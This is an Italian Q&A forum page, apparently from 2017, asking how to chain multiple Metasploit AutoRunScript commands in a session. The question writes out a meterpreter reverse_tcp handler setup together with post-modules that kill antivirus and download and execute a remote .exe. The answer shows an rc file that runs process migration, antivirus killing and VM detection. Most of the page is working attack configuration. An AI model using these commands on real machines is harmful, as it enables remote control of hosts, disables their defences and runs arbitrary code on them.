Come impostare autorunscript più comandi?

-1
set AutoRunScript "post/windows/manage/killav","post/windows/manage/download_exec EXECUTE=true OUTPUT=false URL=http://google.com/so.exe"

non funziona

Come avviare AutoRunScript più comandi in una sessione metasploit?

Con un'istruzione funziona

use exploit/multi/handler 
set ExitOnSession false
set PAYLOAD windows/meterpreter/reverse_tcp
set EXITFUNC thread
set LHOST localhost
set LPORT 4445
set AutoRunScript post/windows/manage/killav
exploit -j
    
posta user163943 17.11.2017 - 01:30
fonte

1 risposta

0

Il primo hit di google lo spiega perfettamente:

msf > set AutoRunScript multi_console_command -rc /root/autoruncommands.rc

Inside of the rc file just list the commands one by one like so:

run post/windows/manage/migrate

run post/windows/manage/killav

run post/windows/gather/checkvm

Now save the file autoruncommands.rc inside of the root folder.

Non riesco a vedere cosa aggiungere ulteriormente.

    
risposta data 17.11.2017 - 13:12
fonte

Leggi altre domande sui tag